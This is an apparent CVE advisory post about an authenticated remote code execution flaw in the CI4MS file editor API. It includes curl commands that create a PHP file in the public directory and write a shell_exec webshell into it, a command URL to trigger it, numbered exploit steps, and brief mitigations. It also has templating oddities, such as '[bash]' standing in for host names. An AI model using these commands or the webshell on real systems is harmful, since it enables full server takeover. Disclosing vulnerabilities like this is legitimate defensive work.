CI4MS, Remote Code Execution, CVE-XXXX-XXXX (Critical)

Listen to this Post

The vulnerability exists within the file editor module’s API endpoints `/backend/fileeditor/createFile` and /backend/fileeditor/save. An authenticated attacker with file editor permissions can call the `createFile` endpoint, specifying a web-accessible directory like `/public` and a filename with a `.php` extension. The endpoint fails to validate or restrict the allowed file extensions. Subsequently, the attacker uses the `save` endpoint to write raw, unsanitized PHP code, such as a webshell, into the newly created file. Because the file is placed in a directory where the web server executes PHP scripts, accessing the file via HTTP triggers the embedded code, allowing the attacker to execute arbitrary operating system commands with the privileges of the web server.

dailycve form:

Platform: CI4MS
Version: Not specified
Vulnerability : Authenticated RCE
Severity: Critical
date: 2024-10-27

Prediction: 2024-11-24

What Undercode Say:

curl -X POST '[bash]/backend/fileeditor/createFile' -d 'path=/public' -d 'name=exploit.php'
curl -X POST '[bash]/backend/fileeditor/save' -H 'Content-Type: application/json' -d '{"path":"/public/exploit.php","content":"<?php echo shell_exec($_GET[\"cmd\"]); ?>"}'
https://[bash]/exploit.php?cmd=id

How Exploit:

1. Authenticate to CI4MS.

2. Create malicious PHP file.

3. Inject webshell code.

4. Execute commands via HTTP.

Protection from this CVE

Path Validation

Extension Whitelisting

Content Sanitization

Disable PHP Execution

Impact

Full Server Access

Arbitrary Command Execution

Data Loss/Theft

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top